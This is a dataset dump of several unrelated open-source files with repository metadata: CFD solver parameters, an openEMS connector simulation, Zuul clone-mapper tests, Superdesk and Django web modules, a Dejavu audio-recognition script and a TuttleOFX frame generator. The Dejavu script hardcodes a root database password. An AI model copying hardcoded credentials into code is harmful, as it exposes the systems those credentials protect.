vof_shockCapturingFactor = 0.5
vof_lag_shockCapturing = True
vof_sc_uref = 1.0
vof_sc_beta = 1.0
rd_shockCapturingFactor = 0.5
rd_lag_shockCapturing = False
epsFact_density = 3.0
epsFact_viscosity = epsFact_curvature = epsFact_vof = epsFact_consrv_heaviside = epsFact_consrv_dirac = epsFact_density
epsFact_redistance = 0.33
epsFact_consrv_diffusion = 10.0
redist_Newton = True
kappa_shockCapturingFactor = 0.25
kappa_lag_shockCapturing = True#False
kappa_sc_uref = 1.0
kappa_sc_beta = 1.0
dissipation_shockCapturingFactor = 0.25
dissipation_lag_shockCapturing = True#False
dissipation_sc_uref = 1.0
dissipation_sc_beta = 1.0
else:
ns_shockCapturingFactor = 0.9
ns_lag_shockCapturing = True
ns_lag_subgridError = True
ns_sed_shockCapturingFactor = 0.9
ns_sed_lag_shockCapturing = True
ns_sed_lag_subgridError = True
ls_shockCapturingFactor = 0.9
ls_lag_shockCapturing = True
ls_sc_uref = 1.0
ls_sc_beta = 1.0
vof_shockCapturingFactor = 0.9
vof_lag_shockCapturing = True
vof_sc_uref = 1.0
vof_sc_beta = 1.0
vos_shockCapturingFactor = 0.9
vos_lag_shockCapturing = True
vos_sc_uref = 1.0
vos_sc_beta = 1.0
rd_shockCapturingFactor = 0.9
rd_lag_shockCapturing = False
epsFact_density = 1.5
epsFact_viscosity = epsFact_curvature = epsFact_vof = epsFact_vos = epsFact_consrv_heaviside = epsFact_consrv_dirac = \
epsFact_density
epsFact_redistance = 0.33
epsFact_consrv_diffusion = 0.1
redist_Newton = False
kappa_shockCapturingFactor = 0.9
kappa_lag_shockCapturing = True #False
kappa_sc_uref = 1.0
kappa_sc_beta = 1.0
dissipation_shockCapturingFactor = 0.9
dissipation_lag_shockCapturing = True #False
dissipation_sc_uref = 1.0
dissipation_sc_beta = 1.0
ns_nl_atol_res = max(1.0e-10, 0.01 * he ** 2)
ns_sed_nl_atol_res = max(1.0e-10, 0.01 * he ** 2)
vof_nl_atol_res = max(1.0e-10, 0.01 * he ** 2)
vos_nl_atol_res = max(1.0e-10, 0.01 * he ** 2)
ls_nl_atol_res = max(1.0e-10, 0.01 * he ** 2)
rd_nl_atol_res = max(1.0e-10, 0.05 * he)
mcorr_nl_atol_res = max(1.0e-10, 0.01 * he ** 2)
kappa_nl_atol_res = max(1.0e-10, 0.01 * he ** 2)
dissipation_nl_atol_res = max(1.0e-10, 0.01 * he ** 2)
phi_nl_atol_res = max(1.0e-10, 0.01 * he ** 2)
pressure_nl_atol_res = max(1.0e-10, 0.01 * he ** 2)
#turbulence
ns_closure = 0 #1-classic smagorinsky, 2-dynamic smagorinsky, 3 -- k-epsilon, 4 -- k-omega
ns_sed_closure = 0 #1-classic smagorinsky, 2-dynamic smagorinsky, 3 -- k-epsilon, 4 -- k-omega
# Water. Fake parameters for convergence test
rho_0 = 1.0
nu_0 = 1.0
# Air
rho_1 = 1.0
nu_1 = 1.0
# Sediment
rho_s = rho_0
nu_s = 10000.0*nu_0
dragAlpha = 0.0
# Surface tension
sigma_01 = 0.0
# Gravity
g = [0.0, 0.0]
|
mit
| 6,489,016,684,883,342,000 | 29.96139 | 125 | 0.628008 | false |
dlharmon/pyopenems
|
examples/vert_connector_ms_oshpark.py
|
1
|
2909
|
#!/usr/bin/env python3
import sys
mm = 0.001
import openems
import openems.geometries
import numpy as np
em = openems.OpenEMS('vert_connector_ms_oshpark', EndCriteria = 1e-5, fmin = 0e6, fmax = 50e9,
boundaries = ['PEC', 'PEC', 'PEC', 'PEC', 'PML_12', 'PEC'])
em.fsteps = 1601
copper = openems.Metal(em, 'copper')
pcopper = openems.Metal(em, 'pcopper')
sub1 = openems.Dielectric(em, 'substrate', eps_r=3.2)
sub2 = openems.Dielectric(em, 'substrate', eps_r=4.0)
sub1t = 0.19*mm
sub2t = 1.0*mm
ifoil = 0.0125*mm
ofoil = 0.035*mm
port_length = 0.1*mm
box_length = 2*mm
box_width = 2*mm
ms_width = 0.42*mm
airspace = 1*mm
via_pad = 0.5*mm
via_clearance = 0.275*mm
bt = sub1t + ofoil
bb = -1*(ofoil+sub2t+sub1t)
em.resolution = 25e-6
em.mesh.AddLine('z', sub1t+airspace)
zmin = bb - 1*mm
em.mesh.AddLine('z', zmin)
planar = openems.geometries.planar_full_box(x=[-0.5*box_length, 0.5*box_length],
y=[-0.5*box_width, 0.5*box_width])
clearance_r = via_pad*0.5 + via_clearance
planar.add(sub1, [0, sub1t], priority=1) # sub1 top
planar.add_center_hole(pcopper, [0, ifoil], clearance_r, priority=2) # inner 1 foil
planar.add(sub2, [0, -sub2t], priority=1) # sub2
planar.add(sub1, [-sub2t, -(sub2t+sub1t)], priority=1) # sub1 bottom
planar.add_center_hole(pcopper, [-sub2t, -(sub2t+ifoil)], clearance_r, priority=2) # inner2 foil
planar.add_center_hole(pcopper, [bb, bb+ofoil], 0.75*mm, priority=1) # bottom foil
# ms line
start = np.array([-0.5*box_length+port_length, 0.5*ms_width, sub1t])
stop = np.array([0, -0.5*ms_width, bt])
copper.AddBox(start, stop, priority=9)
# ms port
start = [-0.5*box_length, ms_width/2.0, sub1t]
stop = [-0.5*box_length + port_length, ms_width/-2.0, bt]
openems.Port(em, start, stop, direction='x', z=50)
via_z = [[bt,bb],[bt, bt-ofoil], [0, ifoil], [-sub2t, -sub2t-ifoil], [bb+ofoil, bb]]
# ground vias
for n in range(-3,4):
r = 1 * mm
c = np.exp(1j*2*np.pi*n*22.0/180.0) * r
openems.Via(copper, priority=9, x=np.real(c), y=np.imag(c), z=via_z,
drillradius = 0.25*mm*0.5,
wall_thickness = 25e-6,
padradius = via_pad * 0.5,
padname='2')
# signal via
openems.Via(copper, priority=9, x=0, y=0,
z=[[bt,bb],[bt, bt-ofoil], [0, ifoil], [-sub2t, -sub2t-ifoil], [bb+ofoil, bb]],
drillradius = 0.25*mm*0.5,
wall_thickness = 25e-6,
padradius = via_pad * 0.5,
padname='1')
# coax shield
planar.add_center_hole(copper, [bb, zmin], r=1.5*mm/2.0, priority=1)
pin_diameter = 0.695*mm
coax_port_length = 0.2*mm
# pin
start = np.array([0, 0, bb])
stop = np.array([0, 0, zmin])
copper.AddCylinder(start, stop, 0.5*pin_diameter, priority=9)
# coax goes into Z- PML
command = 'view solve'
if len(sys.argv) > 1:
command = sys.argv[1]
em.write_kicad(em.name)
em.run_openems(command)
|
gpl-3.0
| 2,444,332,735,108,807,000 | 29.302083 | 96 | 0.617051 | false |
wikimedia/integration-zuul
|
tests/test_clonemapper.py
|
2
|
3045
|
# Copyright 2014 Antoine "hashar" Musso
# Copyright 2014 Wikimedia Foundation Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import testtools
from zuul.lib.clonemapper import CloneMapper
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s %(name)-17s '
'%(levelname)-8s %(message)s')
class TestCloneMapper(testtools.TestCase):
def test_empty_mapper(self):
"""Given an empty map, the slashes in project names are directory
separators"""
cmap = CloneMapper(
{},
[
'project1',
'plugins/plugin1'
])
self.assertEqual(
{'project1': '/basepath/project1',
'plugins/plugin1': '/basepath/plugins/plugin1'},
cmap.expand('/basepath')
)
def test_map_to_a_dot_dir(self):
"""Verify we normalize path, hence '.' refers to the basepath"""
cmap = CloneMapper(
[{'name': 'mediawiki/core', 'dest': '.'}],
['mediawiki/core'])
self.assertEqual(
{'mediawiki/core': '/basepath'},
cmap.expand('/basepath'))
def test_map_using_regex(self):
"""One can use regex in maps and use \\1 to forge the directory"""
cmap = CloneMapper(
[{'name': 'plugins/(.*)', 'dest': 'project/plugins/\\1'}],
['plugins/PluginFirst'])
self.assertEqual(
{'plugins/PluginFirst': '/basepath/project/plugins/PluginFirst'},
cmap.expand('/basepath'))
def test_map_discarding_regex_group(self):
cmap = CloneMapper(
[{'name': 'plugins/(.*)', 'dest': 'project/'}],
['plugins/Plugin_1'])
self.assertEqual(
{'plugins/Plugin_1': '/basepath/project'},
cmap.expand('/basepath'))
def test_cant_dupe_destinations(self):
"""We cant clone multiple projects in the same directory"""
cmap = CloneMapper(
[{'name': 'plugins/(.*)', 'dest': 'catchall/'}],
['plugins/plugin1', 'plugins/plugin2']
)
self.assertRaises(Exception, cmap.expand, '/basepath')
def test_map_with_dot_and_regex(self):
"""Combining relative path and regex"""
cmap = CloneMapper(
[{'name': 'plugins/(.*)', 'dest': './\\1'}],
['plugins/PluginInBasePath'])
self.assertEqual(
{'plugins/PluginInBasePath': '/basepath/PluginInBasePath'},
cmap.expand('/basepath'))
|
apache-2.0
| 6,234,860,600,241,992,000 | 35.25 | 77 | 0.586535 | false |
ioanpocol/superdesk-core
|
apps/content_types/content_types.py
|
1
|
17217
|
import re
import bson
import superdesk
from eve.utils import config
from copy import deepcopy
from superdesk import get_resource_service
from superdesk.errors import SuperdeskApiError
from superdesk.default_schema import DEFAULT_SCHEMA, DEFAULT_EDITOR
from apps.auth import get_user_id
from apps.templates.content_templates import remove_profile_from_templates
from apps.desks import remove_profile_from_desks
from eve.utils import ParsedRequest
from superdesk.resource import build_custom_hateoas
CONTENT_TYPE_PRIVILEGE = 'content_type'
DO_NOT_SHOW_SELECTION = 'do not show'
# Fields that might not be in the schema but should be still available in formatter/output
REQUIRED_FIELDS = (
'language',
)
# Valid editor keys
EDITOR_ATTRIBUTES = (
'order',
'sdWidth',
'required',
'hideDate',
'showCrops',
'formatOptions',
'editor3',
'default',
'cleanPastedHTML',
'imageTitle',
'sourceField',
'section',
)
class ContentTypesResource(superdesk.Resource):
schema = {
'_id': {
'type': 'string',
'iunique': True,
},
'label': {
'type': 'string',
'iunique': True,
},
'description': {
'type': 'string',
},
'schema': {
'type': 'dict'
},
'editor': {
'type': 'dict'
},
'widgets_config': {
'type': 'list',
'schema': {
'type': 'dict',
'schema': {
'widget_id': {'type': 'string'},
'is_displayed': {'type': 'boolean'}
}
}
},
'priority': {
'type': 'integer',
'default': 0,
},
'enabled': {
'type': 'boolean',
'default': False,
},
'is_used': {
'type': 'boolean',
'default': False,
},
'created_by': superdesk.Resource.rel('users', nullable=True),
'updated_by': superdesk.Resource.rel('users', nullable=True),
}
item_url = r'regex("[\w,.:-]+")'
privileges = {'POST': CONTENT_TYPE_PRIVILEGE,
'PATCH': CONTENT_TYPE_PRIVILEGE,
'DELETE': CONTENT_TYPE_PRIVILEGE}
datasource = {
'default_sort': [('priority', -1)],
}
class ContentTypesService(superdesk.Service):
def _set_updated_by(self, doc):
doc['updated_by'] = get_user_id()
def _set_created_by(self, doc):
doc['created_by'] = get_user_id()
def on_create(self, docs):
for doc in docs:
self._set_updated_by(doc)
self._set_created_by(doc)
def on_delete(self, doc):
if doc.get('is_used'):
raise SuperdeskApiError(status_code=202, payload={"is_used": True})
remove_profile_from_templates(doc)
remove_profile_from_desks(doc)
def on_update(self, updates, original):
self._validate_disable(updates, original)
self._set_updated_by(updates)
prepare_for_save_content_type(original, updates)
self._update_template_fields(updates, original)
def on_delete_res_vocabularies(self, doc):
req = ParsedRequest()
req.projection = '{"label": 1}'
res = self.get(req=req, lookup={'schema.' + doc[config.ID_FIELD]: {'$type': 3}})
if res.count():
payload = {'content_types': [doc_hateoas for doc_hateoas in map(self._build_hateoas, res)]}
message = 'Vocabulary "%s" is used in %d content type(s)' % \
(doc.get('display_name'), res.count())
raise SuperdeskApiError.badRequestError(message, payload)
def _build_hateoas(self, doc):
build_custom_hateoas({'self': {'title': 'Content Profile', 'href': '/content_types/{_id}'}}, doc)
return doc
def _validate_disable(self, updates, original):
"""
Checks the templates and desks that are referencing the given
content profile if the profile is being disabled
"""
if 'enabled' in updates and updates.get('enabled') is False and original.get('enabled') is True:
templates = list(superdesk.get_resource_service('content_templates').
get_templates_by_profile_id(original.get('_id')))
if len(templates) > 0:
template_names = ', '.join([t.get('template_name') for t in templates])
raise SuperdeskApiError.badRequestError(
message='Cannot disable content profile as following templates are referencing: {}'.
format(template_names))
req = ParsedRequest()
all_desks = list(superdesk.get_resource_service('desks').get(req=req, lookup={}))
profile_desks = [desk for desk in all_desks if
desk.get('default_content_profile') == str(original.get('_id'))]
if len(profile_desks) > 0:
profile_desk_names = ', '.join([d.get('name') for d in profile_desks])
raise SuperdeskApiError.badRequestError(
message='Cannot disable content profile as following desks are referencing: {}'.
format(profile_desk_names))
def _update_template_fields(self, updates, original):
"""
Finds the templates that are referencing the given
content profile an clears the disabled fields
"""
templates = list(superdesk.get_resource_service('content_templates').
get_templates_by_profile_id(original.get('_id')))
for template in templates:
data = deepcopy(template.get('data', {}))
schema = updates.get('schema', {})
processed = False
for field, params in schema.items():
if not params or not params.get('enabled', True):
data.pop(field, None)
processed = True
if processed:
superdesk.get_resource_service('content_templates').patch(template.get('_id'), {'data': data})
def find_one(self, req, **lookup):
doc = super().find_one(req, **lookup)
if doc and req and 'edit' in req.args:
prepare_for_edit_content_type(doc)
if doc:
clean_doc(doc)
return doc
def set_used(self, profile_ids):
"""Set `is_used` flag for content profiles.
:param profile_ids
"""
query = {'_id': {'$in': list(profile_ids)}, 'is_used': {'$ne': True}}
update = {'$set': {'is_used': True}}
self.find_and_modify(query=query, update=update)
def get_output_name(self, profile):
try:
_id = bson.ObjectId(profile)
item = self.find_one(req=None, _id=_id) or {}
return re.compile('[^0-9a-zA-Z_]').sub('', item.get('label', str(_id)))
except bson.errors.InvalidId:
return profile
def clean_doc(doc):
schema = doc.get('schema', {})
editor = doc.get('editor', {})
vocabularies = get_resource_service('vocabularies').get_forbiden_custom_vocabularies()
for vocabulary in vocabularies:
field = vocabulary.get('schema_field', vocabulary['_id'])
if schema.get(field):
del schema[field]
if editor.get(field):
del editor[field]
clean_json(schema)
clean_json(editor)
def clean_json(json):
if not isinstance(json, dict):
return
for key in list(json.keys()):
value = json[key]
if value is None:
del json[key]
else:
clean_json(value)
def prepare_for_edit_content_type(doc):
clean_doc(doc)
init_default(doc)
editor = doc['editor']
schema = doc['schema']
fields_map, field_names = get_fields_map_and_names()
init_custom(editor, schema, fields_map)
expand_subject(editor, schema, fields_map)
set_field_name(editor, field_names)
init_extra_fields(editor, schema)
def init_extra_fields(editor, schema):
fields = get_resource_service('vocabularies').get_extra_fields()
for field in fields:
field_type = field.get('field_type')
schema.setdefault(field['_id'], {
'type': field_type,
'required': False
})
if field['_id'] in editor:
editor[field['_id']]['enabled'] = True
else:
editor[field['_id']] = {'enabled': False}
editor[field['_id']]['field_name'] = field['display_name']
def get_allowed_list(schema):
try:
return schema['schema']['schema']['scheme']['allowed']
except KeyError:
return []
def get_mandatory_list(schema):
return schema['mandatory_in_list']['scheme']
def get_fields_map_and_names():
vocabularies = get_resource_service('vocabularies').get_custom_vocabularies()
fields_map = {}
field_names = {}
for vocabulary in vocabularies:
if vocabulary.get('selection_type') == DO_NOT_SHOW_SELECTION:
continue
fields_map[vocabulary.get('schema_field', vocabulary['_id'])] = vocabulary['_id']
field_names[vocabulary['_id']] = vocabulary.get('display_name', vocabulary['_id'])
return fields_map, field_names
def init_default(doc):
editor = doc['editor'] = doc.get('editor', None)
schema = doc['schema'] = doc.get('schema', None)
if editor and schema:
for field in DEFAULT_EDITOR:
# add missing fields in editor with enabled = false
if editor.get(field, None) is None:
editor[field] = deepcopy(DEFAULT_EDITOR[field])
editor[field]['enabled'] = False
if schema.get(field, None) is None:
schema[field] = deepcopy(DEFAULT_SCHEMA[field])
else:
editor[field]['enabled'] = True
else:
doc['editor'] = deepcopy(DEFAULT_EDITOR)
doc['schema'] = deepcopy(DEFAULT_SCHEMA)
def init_custom(editor, schema, fields_map):
# process custom fields defined on vocabularies
for old_field, field in fields_map.items():
if field != old_field:
if (editor.get(field, None)):
editor[field]['enabled'] = True
# custom storage for field, replace default editor with custom one
replace_key(editor, old_field, field)
replace_key(schema, old_field, field)
else:
# fields are stored in subject so add new custom editor
schema[field] = {'type': 'list', 'required': False}
if editor.get(field, None):
editor[field]['enabled'] = True
else:
editor[field] = {'enabled': False}
def replace_key(dictionary, oldKey, newKey):
if dictionary.get(oldKey, None):
if not dictionary.get(newKey, None):
dictionary[newKey] = deepcopy(dictionary[oldKey])
del dictionary[oldKey]
elif not dictionary.get(newKey, None):
dictionary[newKey] = {}
def expand_subject(editor, schema, fields_map):
subject = get_subject_name(fields_map)
allowed = get_allowed_list(schema[subject])
mandatory = get_mandatory_list(schema[subject])
default_values = schema[subject].get('default', [])
schema[subject]['schema'] = {}
set_enabled_for_custom(editor, allowed, fields_map)
set_required_for_custom(editor, schema, mandatory, fields_map)
set_default_for_custom(schema, default_values, fields_map)
def set_enabled_for_custom(editor, allowed, fields_map):
for field in allowed:
editor[fields_map.get(field, field)]['enabled'] = True
def set_required_for_custom(editor, schema, mandatory, fields_map):
for field, value in mandatory.items():
if field == value or field == 'subject':
try:
editor[fields_map.get(field, field)]['required'] = value is not None
schema[fields_map.get(field, field)]['required'] = value is not None
except KeyError:
continue
def set_default_for_custom(schema, default_values, fields_map):
for old_field, field in fields_map.items():
if (field == old_field or old_field == 'subject') and schema.get(field, None) is not None:
default = []
for value in default_values:
if value.get('scheme', None) == field:
default.append(value)
schema[field]['default'] = default
def get_subject_name(fields_map):
return fields_map.get('subject', 'subject')
def set_field_name(editor, field_names):
for (field, name) in field_names.items():
editor[field]['field_name'] = name
def prepare_for_save_content_type(original, updates):
editor = updates['editor'] = updates.get('editor', {})
schema = updates['schema'] = updates.get('schema', {})
original = deepcopy(original)
prepare_for_edit_content_type(original)
concatenate_dictionary(original['editor'], editor)
concatenate_dictionary(original['schema'], schema)
delete_disabled_fields(editor, schema)
fields_map, _ = get_fields_map_and_names()
clean_editor(editor)
init_schema_for_custom_fields(schema, fields_map)
compose_subject_schema(schema, fields_map)
if not editor.get("subject"):
# subject must not be mandatory if not present in editor
# Note that it can still be used for custom vocabularies
try:
schema["subject"]["required"] = False
except (TypeError, KeyError):
pass
init_editor_required(editor, schema)
rename_schema_for_custom_fields(schema, fields_map)
def concatenate_dictionary(source, destination):
for key in source:
if key not in destination:
destination[key] = source[key]
def delete_disabled_fields(editor, schema):
for field, value in editor.items():
if value is None or not value.get('enabled', False):
editor[field] = None
schema[field] = None
def clean_editor(editor):
for field_value in editor.values():
if not field_value:
continue
for attribute in list(field_value.keys()):
if attribute not in EDITOR_ATTRIBUTES:
del field_value[attribute]
def compose_subject_schema(schema, fields_map):
mandatory = {}
allowed = []
default = []
for old_field, field in fields_map.items():
if (old_field == field or old_field == 'subject') and schema.get(field, None):
allowed.append(field)
if schema[field].get('required', False):
mandatory[old_field] = field
else:
mandatory[old_field] = None
if schema[field].get('default', None):
default.extend(schema[field]['default'])
else:
mandatory[old_field] = None
if allowed:
init_subject_schema(schema, default, mandatory, allowed, fields_map)
def init_subject_schema(schema, default, mandatory, allowed, fields_map):
subject = get_subject_name(fields_map)
try:
is_required = schema['subject']['required']
except (KeyError, TypeError):
is_required = DEFAULT_SCHEMA['subject'].get('required', False)
schema[subject] = deepcopy(DEFAULT_SCHEMA['subject'])
schema[subject]['default'] = default
schema[subject]['mandatory_in_list']['scheme'] = mandatory
schema[subject]['schema']['schema']['scheme']['allowed'] = allowed
if 'subject' in mandatory: # custom subject field
schema[subject]['required'] = mandatory.get('subject') is not None
else:
schema[subject]['required'] = is_required
def init_editor_required(editor, schema):
for field in schema:
if editor.get(field) and schema.get(field) and schema[field].get('required') is not None:
schema[field]['nullable'] = not schema[field]['required']
def init_schema_for_custom_fields(schema, fields_map):
for field in fields_map.values():
if schema.get(field, None) and schema[field].get('default', None):
list_values = schema[field]['default']
for value in list_values:
value['scheme'] = field
def rename_schema_for_custom_fields(schema, fields_map):
for old_field, field in fields_map.items():
if field in schema:
if old_field != field:
schema[old_field] = schema[field]
del schema[field]
def is_enabled(field, schema):
"""Return true if field is enabled using given schema.
:param field: field name
:param schema: schema dict
"""
return schema.get(field) or schema.get(field) == {} or field not in DEFAULT_SCHEMA or field in REQUIRED_FIELDS
def apply_schema(item):
"""Return item without fields that should not be there given it's profile.
:param item: item to apply schema to
"""
if item.get('type') == 'event':
return item.copy()
try:
profile = get_resource_service('content_types').find_one(req=None, _id=item['profile'])
schema = profile['schema']
except Exception:
schema = DEFAULT_SCHEMA
return {key: val for key, val in item.items() if is_enabled(key, schema)}
|
agpl-3.0
| 6,055,187,326,843,069,000 | 33.434 | 114 | 0.59296 | false |
jonyachen/hearboi
|
hearboi.py
|
1
|
1045
|
import warnings
import json
warnings.filterwarnings("ignore")
from dejavu import Dejavu
from dejavu.recognize import FileRecognizer, MicrophoneRecognizer
config = {
"database": {
"host": "127.0.0.1",
"user": "root",
"passwd": "M914ktIkP!",
"db": "sound_db",
}
}
if __name__ == '__main__':
# create a Dejavu instance
djv = Dejavu(config)
# Fingerprint all the mp3's in the directory we give it
djv.fingerprint_directory("sounds", [".wav"])
# Prints total number of fingerprints - for debugging
#print djv.db.get_num_fingerprints()
# Recognize audio from a file
#song = djv.recognize(FileRecognizer, "sounds/fire_alarm.wav")
#print "From file we recognized: %s\n" % song
# Or recognize audio from your microphone for `secs` seconds
secs = 5
song = djv.recognize(MicrophoneRecognizer, seconds=secs)
if song is None:
print "Nothing recognized -- did you play the song out loud so your mic could hear it? :)"
else:
print "From mic with %d seconds we recognized: %s\n" % (secs, song)
|
mit
| -1,106,891,391,869,320,800 | 26.5 | 92 | 0.680383 | false |
lsbardel/flow
|
flow/web/applications/data.py
|
1
|
4207
|
import platform
from djpcms.core.exceptions import ObjectDoesNotExist
from djpcms.conf import settings
from djpcms.utils.ajax import jhtmls
from djpcms.views import appsite, appview
from djpcms.views.apps.tagging import TagApplication
from dynts.web.views import TimeSeriesView as TimeSeriesViewBase
import unuk
from unuk.http import httplib
from unuk.core.jsonrpc import Proxy
unuk.importlib('servermachine')
from servermachine.forms import ServerForm, ServerMachine
from jflow.db.instdata.models import DataId, EconometricAnalysis, VendorId
from jflow.web import forms
class TimeSeriesView(TimeSeriesViewBase):
def getdata(self, request, code, start, end):
try:
p = self.appmodel.proxy()
return p.raw_parsets(code = code, start = start, end = end)
except Exception, e:
return str(e)
def codeobject(self, object):
return object.code
def change_type(self, djp):
'''Ajax view to change instrument form'''
form = self.get_form(djp, withdata = False)
forms = list(form.forms_only())
if len(forms) == 2:
form = forms[1]
html = form.layout.render(form)
else:
html = ''
return jhtmls(html = html, identifier = '.data-id-instrument')
class DataAddView(appview.AddView):
def ajax__content_type(self, djp):
return change_type(self,djp)
class DataEditView(appview.EditView):
def ajax__content_type(self, djp):
return change_type(self,djp)
def title(self, page, **urlargs):
return u'edit'
slug_regex = '(?P<id>[-\.\w]+)'
class DataApplication(TagApplication):
inherit = True
form = forms.NiceDataIdForm
form_template = 'instdata/dataid_change_form.html'
search_fields = ['code','name','description','tags','isin']
rpc_server_name = 'jflow-rpc'
rpc_server_timeout = None
timeserie = TimeSeriesView(regex = 'timeseries')
complete = appview.AutocompleteView()
add = DataAddView(regex = 'add', isplugin = False)
view = appview.ViewView(regex = slug_regex, parent = None)
edit = DataEditView()
def objectbits(self, obj):
return {'id': obj.code}
def get_object(self, *args, **kwargs):
try:
id = kwargs.get('id',None)
return self.model.objects.get(code = id)
except:
return None
def get_form(self, djp, form_class, withdata = True, initial = None, **kwargs):
if not withdata:
initial = initial or {}
initial.update(dict(djp.request.POST.items()))
f = super(DataApplication,self).get_form(djp, form_class, initial = initial, withdata = withdata, **kwargs)
dataform = f.forms[0][1]
iform = dataform.content_form()
if iform:
f.add(iform)
return f
def object_from_form(self, form):
if len(form.forms) == 2:
form.forms.pop()
return super(DataApplication,self).object_from_form(form)
def proxy(self, client = 'web'):
server = ServerMachine.objects.get_for_machine(self.rpc_server_name)
if not server:
raise ObjectDoesNotExist('Server %s is not in database' % self.rpc_server_name)
http = httplib(timeout = self.rpc_server_timeout, cache = '.cache')
return Proxy(server.path(), http = http)
class EconometricApplication(TagApplication):
inherit = True
form = forms.EconometricForm
form_withrequest = True
add = appview.AddView(regex = 'add')
#edit = appview.EditView(regex = 'edit/(?P<id>\d+)', parent = None)
view = appview.ViewView(regex = '(?P<id>[-\.\w]+)')
class ServerApplication(appsite.ModelApplication):
name = 'Server Monitor'
form = ServerForm
search = appview.SearchView()
add = appview.AddView(regex = 'add', isapp = False)
def object_content(self, djp, obj):
c = super(ServerApplication,self).object_content(djp, obj)
c['info'] = obj.get_info()
return c
def basequery(self, request, **kwargs):
return self.model.objects.filter(machine = platform.node())
|
bsd-3-clause
| 6,784,104,891,990,057,000 | 30.17037 | 115 | 0.631091 | false |
CredoReference/edx-platform
|
common/djangoapps/credo_modules/views.py
|
1
|
6104
|
import json
from collections import OrderedDict
from courseware.courses import get_course_by_id
from django.db import transaction
from django.http import Http404
from django.shortcuts import redirect
from django.core.urlresolvers import resolve, reverse, NoReverseMatch
from django.views.generic.base import View
from django.contrib.auth.decorators import login_required
from django.utils.http import urlunquote
from django.utils.decorators import method_decorator
from credo_modules.models import CredoModulesUserProfile
from credo_modules.utils import additional_profile_fields_hash
from util.json_request import JsonResponse
from edxmako.shortcuts import render_to_response
from opaque_keys.edx.keys import CourseKey
class StudentProfileField(object):
alias = ""
required = False
title = ""
default = ""
options = []
order = None
def __init__(self, alias="", required=False, title="", default="", options=None, order=None, info=False):
self.alias = alias
self.required = required
self.title = title
self.default = default
self.options = options
self.order = order
self.info = info
@classmethod
def init_from_course(cls, course, default_fields=None):
res_unsorted = OrderedDict()
for k, v in course.credo_additional_profile_fields.iteritems():
order = None
try:
order = int(v['order']) if 'order' in v else None
except ValueError:
pass
kwargs = {
'alias': k,
'required': v['required'] if 'required' in v and v['required'] else False,
'title': v['title'] if 'title' in v and v['title'] else k,
'default': default_fields[k] if default_fields and (k in default_fields) else v.get('default'),
'options': v['options'] if 'options' in v and v['options'] else None,
'order': order,
'info': bool(v.get('info'))
}
res_unsorted[k] = StudentProfileField(**kwargs)
return OrderedDict(sorted(res_unsorted.items(), key=lambda t: t[1].order if t[1].order is not None else t[0]))
def show_student_profile_form(request, course, simple_layout=False, redirect_to=None):
course_key = course.id
profiles = CredoModulesUserProfile.objects.filter(user=request.user, course_id=course_key)
if len(profiles) > 0:
profile = profiles[0]
profile_fields = json.loads(profile.meta)
else:
profile_fields = {}
fields = StudentProfileField.init_from_course(course, profile_fields)
context = {
'fields': fields.values(),
'redirect_url': redirect_to if redirect_to else '',
'course_id': unicode(course.id),
}
if simple_layout:
context.update({
'disable_accordion': True,
'allow_iframing': True,
'disable_header': True,
'disable_footer': True,
'disable_window_wrap': True,
'disable_preview_menu': True,
})
return render_to_response("credo_additional_profile.html", context)
class StudentProfileView(View):
@method_decorator(login_required)
@method_decorator(transaction.atomic)
def get(self, request, course_id):
redirect_to = request.GET.get('next', None)
course_key = CourseKey.from_string(course_id)
course = get_course_by_id(course_key)
simple_layout = False
views_with_simple_layout = ('render_xblock_course', 'lti_launch')
if not course.credo_additional_profile_fields:
if not redirect_to:
try:
redirect_to = reverse('dashboard')
except NoReverseMatch:
redirect_to = reverse('home')
else:
redirect_to = urlunquote(redirect_to)
return redirect(redirect_to)
if redirect_to:
try:
redirect_url_info = resolve(redirect_to)
if redirect_url_info.view_name in views_with_simple_layout:
simple_layout = True
except Http404:
pass
return show_student_profile_form(request, course, simple_layout=simple_layout, redirect_to=redirect_to)
@method_decorator(login_required)
@method_decorator(transaction.atomic)
def post(self, request, course_id):
course_key = CourseKey.from_string(course_id)
course = get_course_by_id(course_key)
if not course.credo_additional_profile_fields:
return JsonResponse({}, status=404)
else:
data = request.POST.copy()
to_save_fields = {}
errors = {}
form_fields = StudentProfileField.init_from_course(course)
for field_alias, field in form_fields.iteritems():
passed_field = data.get(field_alias, '')
if not passed_field and field.required:
errors[field_alias] = ''.join([field.title, " field is required"])
else:
to_save_fields[field_alias] = passed_field
if errors:
return JsonResponse(errors, status=400)
else:
to_save_fields_json = json.dumps(to_save_fields, sort_keys=True)
fields_version = additional_profile_fields_hash(course.credo_additional_profile_fields)
profiles = CredoModulesUserProfile.objects.filter(user=request.user, course_id=course_key)
if len(profiles) > 0:
profile = profiles[0]
profile.meta = to_save_fields_json
profile.fields_version = fields_version
profile.save()
else:
profile = CredoModulesUserProfile(user=request.user, course_id=course_key,
meta=to_save_fields_json, fields_version=fields_version)
profile.save()
return JsonResponse({"success": True})
|
agpl-3.0
| 3,038,702,094,937,294,000 | 37.15 | 118 | 0.59846 | false |
cchampet/TuttleOFX
|
doc/plugins/movie/movieGenerator.py
|
1
|
1094
|
from pyTuttle import tuttle
import os
def generate( prefix, number_of_frames ):
"""
Generate a sequence test with number_of_frames frames, burned with the frame index
the sequence will be placed in the documentation directory (DOC_DIR)
and the sequence will named: DOC_DIR/images/prefix#####.png
"""
for i in range( number_of_frames ):
graph = tuttle.Graph()
text = graph.createNode( "tuttle.text", vAlign="center", bold=1, color=[1,1,1,1], format="PAL", textSize=50, text=str(i) )
write = graph.createNode( "tuttle.pngwriter", filename=os.path.join( os.environ["DOC_DIR"], "images", prefix + str(i).zfill(5) + ".png" ) )
graph.connect( [text, write] )
graph.compute( write )
for i in range( number_of_frames ):
graph = tuttle.Graph()
text = graph.createNode( "tuttle.text", vAlign="center", bold=1, color=[1,1,1,1], format="HD", textSize=50, text=str(i) )
write = graph.createNode( "tuttle.pngwriter", filename=os.path.join( os.environ["DOC_DIR"], "images", prefix + "hd_" + str(i).zfill(5) + ".png" ) )
graph.connect( [text, write] )
graph.compute( write )
|
gpl-3.0
